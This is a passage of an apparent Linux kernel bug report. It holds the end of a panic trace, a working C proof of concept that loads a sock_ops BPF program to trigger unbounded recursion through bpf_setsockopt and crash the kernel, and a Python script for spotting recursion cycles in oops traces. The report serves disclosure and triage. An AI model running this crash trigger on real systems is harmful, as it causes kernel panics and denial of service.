[ 138.177704][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
[ 138.177716][ C0] ? prep_compound_page+0x26a/0x520
[ 138.177729][ C0] ? get_page_from_freelist+0x1f46/0x2ae0
[ 138.177744][ C0] tcp_established_options+0x7c4/0xae0
[ 138.177757][ C0] ? __pfx_tcp_established_options+0x10/0x10
[ 138.177770][ C0] ? __skb_clone+0x59c/0x790
[ 138.177782][ C0] __tcp_transmit_skb+0x2c1/0x4cd0
[ 138.177798][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177810][ C0] ? __pfx___tcp_transmit_skb+0x10/0x10
[ 138.177823][ C0] ? __lock_acquire+0x47d/0x2740
[ 138.177838][ C0] ? kvm_clock_get_cycles+0x3f/0x70
[ 138.177856][ C0] tcp_write_xmit+0x187e/0x7dc0
[ 138.177877][ C0] ? _copy_from_iter+0x14b/0x1710
[ 138.177890][ C0] __tcp_push_pending_frames+0xb5/0x3c0
[ 138.177906][ C0] tcp_push+0x22e/0x700
[ 138.177918][ C0] tcp_sendmsg_locked+0x2c05/0x3dd0
[ 138.177935][ C0] ? __pfx_tcp_sendmsg_locked+0x10/0x10
[ 138.177947][ C0] ? do_raw_spin_lock+0x130/0x270
[ 138.177961][ C0] ? __pfx_do_raw_spin_lock+0x10/0x10
[ 138.177975][ C0] ? __pfx_inet_sendmsg+0x10/0x10
[ 138.177987][ C0] ? __local_bh_enable_ip+0xa9/0x130
[ 138.178002][ C0] ? __pfx_tcp_sendmsg+0x10/0x10
[ 138.178019][ C0] ? __pfx_inet_sendmsg+0x10/0x10
[ 138.178031][ C0] tcp_sendmsg+0x34/0x50
[ 138.178042][ C0] inet_sendmsg+0xbe/0x150
[ 138.178054][ C0] __sys_sendto+0x46b/0x500
[ 138.178065][ C0] ? __pfx___sys_sendto+0x10/0x10
[ 138.178075][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.178093][ C0] ? fput+0x9f/0xe0
[ 138.178106][ C0] ? __sys_connect+0x10a/0x1a0
[ 138.178115][ C0] ? __pfx___sys_connect+0x10/0x10
[ 138.178124][ C0] ? fd_install+0x240/0x550
[ 138.178138][ C0] ? xfd_validate_state+0x66/0x190
[ 138.178155][ C0] __x64_sys_sendto+0xe5/0x1c0
[ 138.178165][ C0] ? lockdep_hardirqs_on+0x7c/0x110
[ 138.178181][ C0] do_syscall_64+0x11b/0xf80
[ 138.178198][ C0] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 138.178209][ C0] RIP: 0033:0x7f1ea5c6db54
[ 138.178217][ C0] Code: 89 4c 24 1c e8 ed ac f7 ff 44 8b 54 24 1c
8b 3c 24 45 31 c9 89 c5 48 8b 54
[ 138.178226][ C0] RSP: 002b:00007ffefa0c04c0 EFLAGS: 00000246
ORIG_RAX: 000000000000002c
[ 138.178235][ C0] RAX: ffffffffffffffda RBX: 00007ffefa0c07a8 RCX:
00007f1ea5c6db54
[ 138.178242][ C0] RDX: 0000000000000001 RSI: 000055ccacb80095 RDI:
0000000000000007
[ 138.178247][ C0] RBP: 0000000000000000 R08: 0000000000000000 R09:
0000000000000000
[ 138.178253][ C0] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000000000
[ 138.178259][ C0] R13: 00007ffefa0c07b8 R14: 000055ccacb81dd8 R15:
00007f1ea5d84020
[ 138.178270][ C0] </TASK>
[ 138.178273][ C0] Modules linked in:
[ 138.178280][ C0] ---[ end trace 0000000000000000 ]---
[ 138.178285][ C0] RIP: 0010:mark_lock+0x1d/0xae0
[ 138.178295][ C0] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 55
48 89 e5 41 57 41 56 41 55 41 55
[ 138.178304][ C0] RSP: 0018:ffa000000ceaff90 EFLAGS: 00010086
[ 138.178311][ C0] RAX: 72760a0d8792c400 RBX: ff1100002fa255d8 RCX:
ffffffff96d71118
[ 138.178318][ C0] RDX: 0000000000000008 RSI: ff1100002fa258a8 RDI:
ff1100002fa24a80
[ 138.178324][ C0] RBP: ffa000000ceb0028 R08: 0000000000000000 R09:
0000000000000000
[ 138.178329][ C0] R10: 0000000000000000 R11: 0000000000000007 R12:
ff1100002fa258a8
[ 138.178335][ C0] R13: 0000000000000000 R14: 0000000000000012 R15:
0000000000000003
[ 138.178341][ C0] FS: 00007f1ea5b60740(0000)
GS:ff110000cd71d000(0000) knlGS:0000000000000000
[ 138.178351][ C0] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 138.178358][ C0] CR2: ffa000000ceaff88 CR3: 0000000027657000 CR4:
0000000000753ef0
[ 138.178364][ C0] PKRU: 55555554
[ 138.178368][ C0] Kernel panic - not syncing: Fatal exception in
interrupt
[ 138.178419][ C0] Kernel Offset: disabled
```

## Proof of Concept

The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3).

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <linux/bpf.h>
#include <pthread.h>

#define SOL_TCP 6
#define TCP_NODELAY 1
#define BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG (1<<6)
#define BPF_SOCK_OPS_HDR_OPT_LEN_CB 14
#define BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB 4
#define BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB 5

#define BPF_REG_1 1
#define BPF_REG_2 2
#define BPF_REG_3 3
#define BPF_REG_4 4
#define BPF_REG_5 5
#define BPF_REG_6 6
#define BPF_REG_8 8
#define BPF_REG_10 10

/* struct bpf_insn and the BPF_JMP/BPF_LDX/... opcode bits come from
 * <linux/bpf.h>; only these instruction-building macros (the equivalents
 * of the kernel's filter.h helpers) are missing from the uapi headers. */
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
    ((struct bpf_insn) { .code = BPF_JMP | BPF_OP(OP) | BPF_K, \
                         .dst_reg = DST, .src_reg = 0, .off = OFF, .imm = IMM })
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
    ((struct bpf_insn) { .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
                         .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
    ((struct bpf_insn) { .code = BPF_ALU64 | BPF_MOV | BPF_X, \
                         .dst_reg = DST, .src_reg = SRC, .off = 0, .imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
    ((struct bpf_insn) { .code = BPF_ALU64 | BPF_MOV | BPF_K, \
                         .dst_reg = DST, .src_reg = 0, .off = 0, .imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
    ((struct bpf_insn) { .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
                         .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
    ((struct bpf_insn) { .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
                         .dst_reg = DST, .src_reg = 0, .off = 0, .imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
    ((struct bpf_insn) { .code = BPF_JMP | BPF_CALL, .dst_reg = 0, \
                         .src_reg = 0, .off = 0, .imm = FUNC })
#define BPF_EXIT_INSN() \
    ((struct bpf_insn) { .code = BPF_JMP | BPF_EXIT, .dst_reg = 0, \
                         .src_reg = 0, .off = 0, .imm = 0 })

int bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
                  int insn_cnt, const char *license) {
    union bpf_attr attr = {
        .prog_type = type,
        .insns = (uint64_t)insns,
        .insn_cnt = insn_cnt,
        .license = (uint64_t)license,
        .log_level = 1,
        .log_size = 65536,
        .log_buf = (uint64_t)malloc(65536),
    };
    int ret = syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
    if (ret < 0) {
        /* The verifier log explains why a program was rejected. */
        printf("bpf_prog_load failed: %m\n%s\n", (char *)attr.log_buf);
    }
    return ret;
}

/* Loopback peer so that connect() and send() below complete locally. */
void *server_thread(void *arg) {
    (void)arg;
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(12345),
                                .sin_addr.s_addr = htonl(INADDR_ANY) };
    bind(s, (struct sockaddr *)&addr, sizeof(addr));
    listen(s, 1);

    int c = accept(s, NULL, NULL);
    char buf[64];
    while (recv(c, buf, sizeof(buf), 0) > 0) {}
    return NULL;
}

int main() {
    struct bpf_insn prog[] = {
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),                  // 0: save ctx
        BPF_LDX_MEM(BPF_W, BPF_REG_2, BPF_REG_6, 0),          // 1: r2 = ctx->op

        // if op == BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB (4) -> set flag
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_2, BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB, 4),  // 2: jumps to 7
        // if op == BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB (5) -> set flag
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_2, BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB, 3), // 3: jumps to 7
        // if op == BPF_SOCK_OPS_HDR_OPT_LEN_CB (14) -> trigger setsockopt
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_2, BPF_SOCK_OPS_HDR_OPT_LEN_CB, 7),         // 4: jumps to 12

        BPF_MOV64_IMM(BPF_REG_0, 0),                          // 5
        BPF_EXIT_INSN(),                                      // 6

        // --- Established CB: enable the header-option write flag
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),                  // 7
        BPF_MOV64_IMM(BPF_REG_2, BPF_SOCK_OPS_WRITE_HDR_OPT_CB_FLAG),
        BPF_EMIT_CALL(59),                                    // bpf_sock_ops_cb_flags_set
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

        // --- HDR_OPT_LEN_CB: setsockopt(TCP_NODELAY) from inside the callback to recurse
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),                  // 12
        BPF_MOV64_IMM(BPF_REG_2, SOL_TCP),
        BPF_MOV64_IMM(BPF_REG_3, TCP_NODELAY),
        BPF_MOV64_IMM(BPF_REG_8, 1),
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_8, -4),        // val = 1 on the BPF stack
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, -4),                // r4 = &val
        BPF_MOV64_IMM(BPF_REG_5, 4),                          // sizeof(val)
        BPF_EMIT_CALL(49),                                    // bpf_setsockopt
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    int prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCK_OPS, prog,
                                sizeof(prog) / sizeof(prog[0]), "GPL");
    if (prog_fd < 0) return 1;

    system("mkdir -p /sys/fs/cgroup/bpf_oops");
    int cg_fd = open("/sys/fs/cgroup/bpf_oops", O_RDONLY);
    if (cg_fd < 0) return 1;

    // Attach the sock_ops program to the cgroup
    union bpf_attr attr = {
        .target_fd = cg_fd,
        .attach_bpf_fd = prog_fd,
        .attach_type = BPF_CGROUP_SOCK_OPS,
    };
    syscall(__NR_bpf, BPF_PROG_ATTACH, &attr, sizeof(attr));

    // Move this process into the cgroup so its sockets hit the program
    char pid[32];
    sprintf(pid, "%d", getpid());
    int procs = open("/sys/fs/cgroup/bpf_oops/cgroup.procs", O_WRONLY);
    write(procs, pid, strlen(pid));
    close(procs);

    pthread_t thread;
    pthread_create(&thread, NULL, server_thread, NULL);
    sleep(1);

    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(12345),
                                .sin_addr.s_addr = htonl(INADDR_LOOPBACK) };
    connect(s, (struct sockaddr *)&addr, sizeof(addr));

    // Trigger pushing pending frames and BPF recursive execution
    send(s, "A", 1, 0);

    sleep(2);
    return 0;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.
Attachment: config-next
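As an added triage aid that is not part of the thread: a Python script that parses an oops "Call Trace", drops the `?`-marked guessed frames, and finds the shortest block of frames that repeats back to back, which is how a reporter or maintainer can confirm unbounded recursion and name the cycle (and the non-recursive caller that entered it) from a log like the one above. The sample trace is a constructed, shortened version of the reported one; the frame names and offsets are taken from the report.

```python
import re
from typing import Dict, List, Optional, Tuple

# One frame line of an x86-64 oops "Call Trace", e.g.
#   [  138.173553][ C0] bpf_skops_hdr_opt_len+0x303/0x440
#   [  138.173567][ C0] ? __pfx_bpf_skops_hdr_opt_len+0x10/0x10
# A leading "?" marks a guessed (possibly stale) frame; those are dropped.
FRAME_RE = re.compile(
    r"^\[\s*[\d.]+\]\[\s*C\d+\]\s+(?P<guess>\?\s+)?"
    r"(?P<sym>[A-Za-z_][\w.]*)\+0x[0-9a-f]+/0x[0-9a-f]+"
)


def parse_frames(log: str) -> List[str]:
    """Reliable frames of the trace, innermost first, with offsets stripped."""
    frames: List[str] = []
    for line in log.splitlines():
        m = FRAME_RE.match(line.strip())
        if m and not m.group("guess"):
            frames.append(m.group("sym"))
    return frames


def find_cycle(frames: List[str], min_repeats: int = 3) -> Optional[Tuple[int, List[str], int]]:
    """Return (start, cycle, repeats) for the back-to-back repeated block that
    covers the most frames, or None if nothing repeats min_repeats times.
    Ties go to the shortest period, so ABABAB is reported as [A, B]."""
    n = len(frames)
    best = None  # (covered, start, period, repeats)
    for start in range(n):
        for period in range(1, (n - start) // min_repeats + 1):
            block = frames[start:start + period]
            repeats = 1
            while frames[start + repeats * period:start + (repeats + 1) * period] == block:
                repeats += 1
            if repeats < min_repeats:
                continue
            covered = repeats * period
            if best is None or covered > best[0] or (covered == best[0] and period < best[2]):
                best = (covered, start, period, repeats)
    if best is None:
        return None
    _, start, period, repeats = best
    return start, frames[start:start + period], repeats


def summarize(log: str) -> Dict[str, object]:
    """Triage summary: the cycle, its repeat count and the outer frame that entered it."""
    frames = parse_frames(log)
    found = find_cycle(frames)
    if found is None:
        return {"frames": len(frames), "cycle": None, "period": 0, "repeats": 0, "entered_from": None}
    start, cycle, repeats = found
    end = start + repeats * len(cycle)
    return {
        "frames": len(frames), "cycle": cycle, "period": len(cycle), "repeats": repeats,
        # The frame just outside the last repetition is the non-recursive caller
        # that started the loop (the tcp_sendmsg() push path in the report).
        "entered_from": frames[end] if end < len(frames) else None,
    }


# Constructed sample: a shortened version of the report's trace, with the
# nine-frame cycle repeated four times (the real trace repeats it far more).
_CYCLE = [
    "tcp_current_mss+0x1d9/0x490", "do_tcp_setsockopt+0x224b/0x2c40",
    "sol_tcp_sockopt+0x6bd/0xad0", "__bpf_setsockopt+0x158/0x220",
    "bpf_sock_ops_setsockopt+0x116/0x210", "bpf_prog_62c2f8b7eac2f54e+0x7d/0x81",
    "__cgroup_bpf_run_filter_sock_ops+0x2c3/0x990", "bpf_skops_hdr_opt_len+0x303/0x440",
    "tcp_established_options+0x7c4/0xae0",
]
_INNER = ["__lock_acquire+0x47d/0x2740", "lock_acquire+0x1ba/0x360",
          "ip_dst_mtu_maybe_forward.constprop.0+0x36/0x6f0", "? __pfx_ipv4_mtu+0x10/0x10"]
_OUTER = ["__tcp_transmit_skb+0x2c1/0x4cd0", "tcp_write_xmit+0x187e/0x7dc0",
          "__tcp_push_pending_frames+0xb5/0x3c0", "tcp_push+0x22e/0x700",
          "tcp_sendmsg_locked+0x2c05/0x3dd0", "tcp_sendmsg+0x34/0x50",
          "do_syscall_64+0x11b/0xf80"]
SAMPLE_TRACE = "\n".join(
    f"[ {138.17 + i * 1e-5:.6f}][ C0] {sym}"
    for i, sym in enumerate(_INNER + _CYCLE * 4 + _OUTER)
)

if __name__ == "__main__":
    s = summarize(SAMPLE_TRACE)
    print(f"{s['repeats']}x cycle of {s['period']} frames, entered from {s['entered_from']}:")
    for sym in s["cycle"]:
        print("   ", sym)
```

Feeding it the full trace from the report instead of the sample gives the same nine-frame cycle with a far higher repeat count, which is the signature to look for before concluding a stack guard page hit is recursion rather than a single oversized frame.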